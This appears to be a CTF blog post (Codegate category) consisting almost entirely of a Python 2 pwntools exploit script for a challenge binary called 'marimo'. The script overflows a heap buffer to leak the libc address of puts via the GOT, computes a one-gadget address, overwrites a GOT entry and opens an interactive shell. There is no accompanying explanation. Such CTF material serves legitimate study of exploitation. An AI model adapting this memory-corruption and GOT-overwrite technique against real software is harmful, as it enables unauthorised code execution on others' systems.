exploit code
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 | from pwn import *import timedef show_me_the_marimo(name, profile): r.sendline("show me the marimo") print r.recvuntil(">>") r.sendline(name) print r.recvuntil(">>") r.sendline(profile) print r.recvuntil(">>")def view(select): r.sendline("V") print r.recvuntil(">>") r.sendline(select)if __name__ == "__main__": binary = "./marimo" elf = ELF(binary) r = process(binary) #strcmp_got = elf.got['strcmp'] puts_got = elf.got['puts'] print r.recvuntil(">>") show_me_the_marimo("A"*4, "B"*4) show_me_the_marimo("C"*4, "D"*4) time.sleep(3) payload = "A"*52 payload += p32(0x0) payload += p64(puts_got) #payload += p64(strcmp_got) payload += p64(puts_got) view("0") print r.recvuntil(">>") r.sendline("M") print r.recvuntil(">>") r.sendline(payload) #pause() print r.recvuntil(">>") r.sendline("B") print r.recvuntil(">>") view("1") print r.recvuntil("name : ") libc_puts = u64(r.recv(6).ljust(8, "\x00")) print r.recvuntil(">>") log.info("libc_puts = {}".format(hex(libc_puts))) libc_oneshot = libc_puts - 0x2a47a log.info("oneshot = {}".format(hex(libc_oneshot))) r.sendline("M") print r.recvuntil(">>") #pause() r.sendline(p64(libc_oneshot)) #pause() r.interactive() |
'CTF > Codegate' 카테고리의 다른 글
| codegate2019 20000 (0) | 2019.02.07 |
|---|---|
| CodeGate2018 BaskinRobins31 (0) | 2018.07.14 |
| Codegate 2018 RedVelvet writeup (0) | 2018.02.04 |